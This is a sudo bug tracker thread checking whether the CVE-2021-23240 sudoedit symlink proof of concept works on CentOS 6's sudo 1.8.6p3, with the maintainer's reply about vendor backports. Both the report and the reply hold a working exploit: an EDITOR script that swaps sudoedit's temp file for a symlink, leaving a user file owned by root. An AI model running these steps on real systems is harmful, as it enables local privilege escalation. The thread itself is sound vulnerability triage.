Bug 979

Summary: PoC for CVE-2021-23240 also work on sudo-1.8.6
Product: Sudo Reporter: Aleksey Deyneko <adeyneko>
Component: DocumentationAssignee: Todd C. Miller <Todd.Miller>
Status: RESOLVED INVALID    
Severity: normal CC: adeyneko
Priority: low    
Version: 1.8.6   
Hardware: PC   
OS: Other   
Attachments: strace.out

Description Aleksey Deyneko 2021-06-17 02:55:32 MDT 
First of all, in CVE DB (https://cve.circl.lu/cve/CVE-2021-23240) affected sudo versions start from 1.3.0. But, in sudo site affected versions starts from 1.8.11.

So, i try to check, is version sudo-1.8.6 (OS CentOS 6) is affected by PoC. And it is affected, at least PoC working. 

From PoC description

# echo 0 > /proc/sys/fs/protected_symlinks
-bash: /proc/sys/fs/protected_symlinks: No such file or directory

# cat /etc/sudoers
testuser ALL=(root) sudoedit /etc/somefile
...

$ cat > myeditor <<'EOF'
> #!/bin/sh
> echo replacing $1
> rm $1
> ln -s /home/testuser/targetfile $1
> exit 0
> EOF

$ chmod 755 myeditor
$ touch /home/testuser/targetfile
$ ls -l /home/testuser/targetfile
-rw-rw-r--. 1 testuser testuser 0 Jun 17 07:38 /home/testuser/targetfile

$ EDITOR=`pwd`/myeditor sudoedit -r unconfined_r -t unconfined_t /etc/somefile
[sudo] password for testuser:
replacing /var/tmp/sudo.Uxthl3

$ ll /home/testuser/targetfile
-rw-rw-r--. 1 root root 0 Jun 17 07:38 /home/testuser/targetfile

$ cat /etc/*release
CentOS release 6.10 (Final, ELS by Cloudlinux)

$ rpm -qa | grep sudo
sudo-1.8.6p3-29.el6_10.3.x86_64

So, i think, this mean, that affected versions starts earler, than 1.8.11 or PoC not correct.
Comment 1 Aleksey Deyneko 2021-06-17 06:48:32 MDT 
I try to search chown() in strace ouput, and found it:

# strace -o strace.out -E EDITOR=/home/testuser/myeditor sudoedit -u testuser -p 12345678 -r unconfined_r -t unconfined_t /etc/somefile
replacing /var/tmp/sudo.jSDgvV

(I don't know how run strace and sudoedit from user session, i got a message 'sudoedit: effective uid is not 0, is sudo installed setuid root?')

strace.out add to attachments
Comment 2 Aleksey Deyneko 2021-06-17 06:49:08 MDT 
Created attachment 557 [details]
strace.out
Comment 3 Todd C. Miller 2021-06-17 07:01:28 MDT 
I'm sorry but that is not a valid test.  The sudo package shipped by RedHat (and CentOS) has thousands of lines of changes backported from newer versions of sudo.  The stock version of sudo 1.8.6p3 does not have the bug because the code in question simply does not exist there.

I just verified this on CentOS 6 by compiling my own sudo 1.8.6p3 package from stock sources:

[testuser@rh6 ~]$ id
uid=501(testuser) gid=501(testuser) groups=501(testuser) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

[testuser@rh6 ~]$ cat myeditor
#!/bin/sh
echo replacing $1
rm $1
ln -s /home/testuser/targetfile $1
exit 0

[testuser@rh6 ~]$ ls -l /home/testuser/targetfile
-rw-r--r--. 1 testuser testuser 0 Jun 17 08:57 /home/testuser/targetfile

[testuser@rh6 ~]$ EDITOR=`pwd`/myeditor sudoedit -r unconfined_r -t unconfined_t /etc/somefile
sudoedit: unable to execute sudoedit: Permission denied
sudoedit: /etc/somefile unchanged
Comment 4 Todd C. Miller 2021-06-17 07:28:12 MDT 
I just confirmed that CVE-2021-23240 is present in the RedHat sudo 1.8.6p3 package.  Unfortunately, I can't support old versions of sudo that have large patch sets (which may introduce bugs not present in mainline sudo).

I'll add a note to https://www.sudo.ws/alerts/sudoedit_selinux.html that vendor packages may include patches that cause older sudo packages to be vulnerable.
Comment 5 Todd C. Miller 2021-06-17 09:38:30 MDT 
It appears that RedHat only fixed the bug in RHEL 8.  https://access.redhat.com/security/cve/cve-2021-23240

I'm closing this bug as it is specific to the RedHat frankenbuild of sudo and they do not seem to be interested in fixing it for older versions of RHEL.  You can always find builds of the latest version of sudo at https://www.sudo.ws/download.html#binary